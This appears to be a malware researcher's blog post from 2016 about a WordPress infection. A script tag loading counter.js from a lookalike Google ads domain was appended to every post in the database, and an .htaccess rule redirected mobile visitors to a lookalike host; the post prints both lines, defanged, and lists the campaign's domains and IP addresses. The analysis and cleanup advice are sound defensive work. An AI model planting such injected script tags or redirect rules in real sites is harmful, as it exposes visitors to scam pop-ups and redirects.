Fake AdWords Domain Advertises USA Immigration Service

  • January 5, 2016
Labs Note

You might know Google popular services: Google Ads, AdSense and DoubleClick. You might even know scripts and domains they use. For example, DoubleClick loads scripts from googleads.g.doubleclick.net and AdWords load a conversion tracker script from www.googleadservices.com/pagead/conversion.js.

<script type="text/javascript"   src="//www.googleadservices.com/pagead/conversion.js">   </script>

Recently, we cleaned an infected WordPress site where every post in the wp_posts table was appended by the following script.

<script src="http://ads.googleadservices[.]at/counter.js" type="text/javascript"></script>

The same googleadservices domain, just on the .at TLD. Easy to confuse with the Google’s one.

This domain can be also found in conditional mobile redirect rules in .htaccess

...RewriteRule ^(.*)$ http://mobile.googleadservices[.]at [L,R=302]

If we open that counter.js script, we’ll see that it creates a pop-up loading hxxp://googleads.g.doubleclick[.]cn.com/cfqv.cgi?18. Again, the same googleads.g.doubleclick domain as in DoubleClick but on .cn.com instead of .net.

In our experience. such domains usually redirect traffic to some ad network or to whoever pays for it. In this case, the pop-up always shows the usa-immigration-service[.]us site and it looks like the whole malware campaign was created (and doubleclick[.]cn.com and googleadservices[.]at were registered) specifically to promoted that immigration service site (which could easily be a scam).

You can see it if you check the IP addresses of each site:

  • ads.googleadservices[.]at 37.139.50.191 – dedicated server in Russia
  • googleads.g.doubleclick[.]cn.com – 37.139.50.190 – dedicated server in Russia
  • usa-immigration-service[.]us – 37.139.50.190 – dedicated server in Russia

Summary

  • Don’t trust well know domains. Especially when they are misspelled or have a different TLD. Especially when they are found in the places where you didn’t put them.
  • Don’t trust obtrusive ads. If you see pop-up or redirects unrelated to sites you visit, the chances are they are scam.
  • When you clean your website, don’t forget about the database. It can be infected too. We clean lots of sites with infected databases.

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like